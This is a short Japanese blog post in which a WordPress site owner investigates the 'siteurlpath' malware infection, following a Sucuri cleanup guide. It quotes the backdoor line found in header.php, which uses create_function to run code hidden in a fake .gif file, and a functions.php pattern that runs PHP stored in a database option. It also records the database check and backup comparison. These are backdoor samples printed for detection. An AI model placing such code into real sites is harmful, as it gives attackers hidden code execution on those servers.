siteurlpathマルウェア?wp__theme_iconの記述を確認
Cleaning the “siteurlpath” hack on WordPress (wplinksforwork and hemoviestube spam bots) | Sucuri
header.phpに以下の記述があることを発見。
<?php $wp__theme_icon=@create_function('',@file_get_contents('/themes/dabsky/images/menu-riight.gif'));$wp__theme_icon(); ?>
しかしfunctions.phpには記述を確認できず。
if(!isset($siteurlpath)&& @get_option(‘siteurlpath’)){
$siteurlpath=create_function(”,(get_option(‘siteurlpath’)));
$siteurlpath();
}
バックアップファイルを見てみると、2011年1月1日のファイルには感染を確認できず。
次のバックアップが2012年3月13日(この間、テンプレートファイルを更新していないため)で、感染を確認。
しかしfunctions.phpにこの記述を確認できず。
上記サイトの説明によると、指定されたファイル(menu_riight.gif)を表示する時に、画像ファイルではなくウイルスコードを送出するらしい。
しかし幸運にも、menu_riight.gifはファイルを置いてあるだけで使ってなかったため、感染拡大は防げていた模様(?)
Cleaning up the database
Run the following query to see if your database is infected:
> select * from wp_options where option_name = ‘siteurlpath’;
に従い、データベースを検索したが、見つからず。
データベースの感染の疑いはなし、と。
WordPressに感染する、という情報も見つかった。
たしかにMacを購入してしばらくはアンチウイルスを入れなかった時期があるけど、やはりその間に感染したんだろうか。。。
感染源、マルウェア本体が見つからないまま、この件は終了。。。
